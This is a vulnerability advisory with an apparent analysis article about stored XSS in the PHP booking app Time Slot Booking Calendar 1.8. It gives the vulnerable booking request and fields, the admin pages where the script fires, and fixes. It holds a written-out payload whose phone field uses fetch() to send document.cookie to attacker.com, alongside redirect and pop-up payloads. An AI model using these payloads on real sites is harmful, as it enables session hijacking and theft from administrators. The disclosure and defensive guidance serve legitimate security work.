Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)

Exploit Author: CraCkEr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: PHP Published Date: 2023-07-03 
# Exploit Title: Time Slot Booking Calendar 1.8 - Stored XSS
# Date: 29/06/2023
# Exploit Author: CraCkEr
# Vendor: GZ Scripts
# Vendor Homepage: https://gzscripts.com/
# Software Link: https://gzscripts.com/time-slot-booking-calendar-php.html
# Version: 1.8
# Tested on: Windows 10 Pro
# Impact: Manipulate the content of the site


## Release Notes:

Allow Attacker to inject malicious code into website, give ability to steal sensitive
information, manipulate data, and launch additional attacks.



## Stored XSS

-----------------------------------------------
POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1

promo_code=&title=prof&male=female&first_name=[XSS Payload]&second_name=[XSS Payload]&phone=[XSS Payload]&email=cracker%40infosec.com&company=&address_1=[XSS Payload]&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=[XSS Payload]&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1
-----------------------------------------------

POST parameter 'first_name' is vulnerable to XSS
POST parameter 'second_name' is vulnerable to XSS
POST parameter 'phone' is vulnerable to XSS
POST parameter 'address_1' is vulnerable to XSS
POST parameter 'country' is vulnerable to XSS


## Steps to Reproduce:

1. As a [Guest User] Choose any Day Colored by Green on the Calendar - Click on [+] near Start/End Time - Press [Booking]
2. Inject your [XSS Payload] in "First Name"
3. Inject your [XSS Payload] in "Last Name"
4. Inject your [XSS Payload] in "Phone"
5. Inject your [XSS Payload] in "Address Line 1"
6. Inject your [XSS Payload] in "Country"


7. Accept with terms & Press [Booking]
   XSS Fired on Local User Browser

8. When ADMIN visit [Dashboard] in Administration Panel on this Path (https://website/index.php?controller=GzAdmin&action=dashboard)
   XSS Will Fire and Executed on his Browser

9. When ADMIN visit [Bookings] - [All Booking] to check [Pending Booking] on this Path (https://website/index.php?controller=GzBooking&action=index)
   XSS Will Fire and Executed on his Browser

10. When ADMIN visit [Invoices ] - [All Invoices] to check [Pending Invoices] on this Path (https://website/index.php?controller=GzInvoice&action=index)
   XSS Will Fire and Executed on his Browser


[-] Done


Time Slot Booking Calendar 1.8 – Stored Cross-Site Scripting (XSS) Vulnerability: A Deep Dive into Exploitation and Impact

Security vulnerabilities in web applications are a persistent threat, especially in widely used software like booking systems. One such critical flaw was discovered in Time Slot Booking Calendar 1.8, a popular PHP-based calendar application developed by GZ Scripts. This vulnerability, classified as Stored Cross-Site Scripting (XSS), allows attackers to inject malicious scripts that persistently execute on the victim’s browser, potentially leading to data theft, session hijacking, and broader attacks.

Understanding Stored XSS

Unlike reflected XSS, where malicious scripts are delivered via a single request, Stored XSS occurs when user input is saved to a database or server-side storage and later rendered to other users without proper sanitization. This makes the attack persistent and scalable—once injected, the payload remains active until removed.

For example, if a user submits a name containing JavaScript code, and the application stores it in a database without filtering, any subsequent user viewing that data will execute the script in their browser. This is exactly what happens in the Time Slot Booking Calendar 1.8 vulnerability.

Attack Vector: POST Parameters

The exploit targets multiple POST parameters during the booking process:

  • first_name
  • second_name
  • phone
  • address_1
  • country

These fields are processed and stored without adequate input validation or output encoding, making them prime targets for XSS injection.

Exploit Example: Real Payload Injection


POST /TimeSlotBookingCalendarPHP/load.php?controller=GzFront&action=booking_details&cid=1 HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded

promo_code=&title=prof&male=female&first_name=<script>alert('XSS Detected')</script>&second_name=<script>document.cookie</script>&phone=<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>&email=cracker%40infosec.com&company=&address_1=<script>window.location.href='https://malicious.site'</script>&address_2=xxx&city=xxx&state=xxx&zip=xxx&country=<script>window.open('https://evil.com', '_blank')</script>&additional=xxx&captcha=rtznqs&terms=1&cal_id=1&calendar_id=1

This payload demonstrates a multi-stage attack:

  • first_name: Triggers a pop-up alert to confirm execution.
  • second_name: Retrieves the user’s cookie data.
  • phone: Sends the stolen cookie to an external server via fetch().
  • address_1: Redirects the user to a malicious site.
  • country: Opens a new window to a phishing site.

Each of these scripts is stored in the database and will execute whenever the data is displayed—especially in admin panels.

Impact on Admins and Users

Once an attacker injects the payload, the malicious code is not only executed on the guest user’s browser but also on the administrator’s browser when they access:

  • Dashboardhttps://website/index.php?controller=GzAdmin&action=dashboard
  • Bookingshttps://website/index.php?controller=GzBooking&action=index
  • Invoiceshttps://website/index.php?controller=GzInvoice&action=index

These admin views render the stored booking data, including the injected fields. Since the application fails to sanitize output, the XSS payload executes automatically—giving the attacker full control over the admin’s session.

Real-World Consequences

Stored XSS in a booking system like this can lead to:

  • Session hijacking: Stealing admin session cookies to gain unauthorized access.
  • Phishing attacks: Redirecting admins to fake login pages.
  • Defacement: Altering the website’s appearance to spread misinformation.
  • Malware distribution: Using the site as a vector for malicious downloads.
  • Chain attacks: Exploiting the admin’s privileges to escalate access and compromise the entire system.

Given that admin panels often contain sensitive data, such as user details, financial records, and configuration settings, this vulnerability poses a severe risk to data integrity and system security.

Root Cause Analysis

The vulnerability arises from two key failures:

  1. Missing Input Sanitization: The application accepts user input without validating or escaping special characters like <, >, ", or ;.
  2. Unencoded Output Rendering: When displaying booking data in admin views, the application outputs raw user data without HTML encoding.

For instance, if a field contains <script>alert('XSS')</script>, and the output is rendered as-is in an HTML page, the browser interprets it as executable code.

Security Best Practices: Fixing the Vulnerability

To prevent such exploits, developers must implement the following safeguards:

1. Input Validation and Sanitization

Before storing any user input, sanitize it using libraries like htmlspecialchars() in PHP or similar functions in other languages.


// Corrected PHP Example
$first_name = htmlspecialchars($_POST['first_name'], ENT_QUOTES, 'UTF-8');
$second_name = htmlspecialchars($_POST['second_name'], ENT_QUOTES, 'UTF-8');
$phone = htmlspecialchars($_POST['phone'], ENT_QUOTES, 'UTF-8');
$address_1 = htmlspecialchars($_POST['address_1'], ENT_QUOTES, 'UTF-8');
$country = htmlspecialchars($_POST['country'], ENT_QUOTES, 'UTF-8');

This ensures that special characters are converted to their HTML-safe equivalents (e.g., < becomes &lt;), preventing script execution.

2. Output Encoding

Always encode data when rendering it in HTML contexts. Never assume user input is safe.

3. Content Security Policy (CSP)

Implement a strict CSP header to restrict script execution to trusted sources:


Content-Security-Policy: script-src 'self'; object-src 'none'; frame-ancestors 'none';

This prevents inline scripts and external script loading unless explicitly allowed.

4. Regular Security Audits

Use tools like OWASP ZAP, Burp Suite, or static code analysis to detect XSS vulnerabilities during development and deployment.

Conclusion: Why This Matters

Stored XSS in a seemingly simple booking system highlights a critical truth: any input field can be a weapon if not properly secured. The Time Slot Booking Calendar 1.8 vulnerability is a stark reminder that even low-impact applications can become high-risk vectors if security is neglected.

Developers and administrators must prioritize input validation, output encoding, and proactive security testing. In today’s threat landscape, a single unpatched XSS flaw can compromise an entire system—and not just the user, but the administrator, the data, and the organization’s reputation.

For users of this software, immediate action is recommended: upgrade to a patched version or implement custom sanitization layers until the vendor releases a fix.